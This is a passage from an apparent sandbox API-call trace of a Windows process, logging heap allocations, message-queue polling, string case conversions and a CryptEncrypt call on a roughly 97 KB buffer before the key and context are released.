lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.883] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.888] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x17d25, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x17d28) returned 1 [0206.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.888] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.889] CharLowerBuffW (in: lpsz="byte[97576]", cchLength=0xb | out: lpsz="byte[97576]") returned 0xb [0206.889] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.890] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.890] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.890] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.890] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.890] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.890] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.890] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34e1cb0*, pdwDataLen=0x8bef68*=0x17d25, dwBufLen=0x17d28 | out: pbData=0x34e1cb0*, pdwDataLen=0x8bef68*=0x17d28) returned 1 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.892] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.892] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.892] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.892] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.892] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.892] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.892] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.893] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.893] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.893] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.893] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.893] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.893] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.893] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.901] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.906] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.906] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.906] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0206.906] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.906] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0206.906] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.906] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.906] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.906] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.906] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.906] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.906] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0206.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.907] CryptDestroyKey (hKey=0xaa5760) returned 1 [0206.907] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.907] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.907] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.907] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.907] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.907] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.907] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.907] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.907] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.907] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.907] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.907] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.907] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0206.907] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.907] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.908] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.908] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.908] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.908] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.908] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.908] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.908] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.908] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.908] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.908] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.909] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.909] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.909] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.909] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.909] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.909] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.909] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.909] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.909] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.909] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.909] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.909] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.909] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.909] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.909] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.909] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.910] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.910] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.910] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.910] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.910] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.910] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0206.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.912] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0206.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 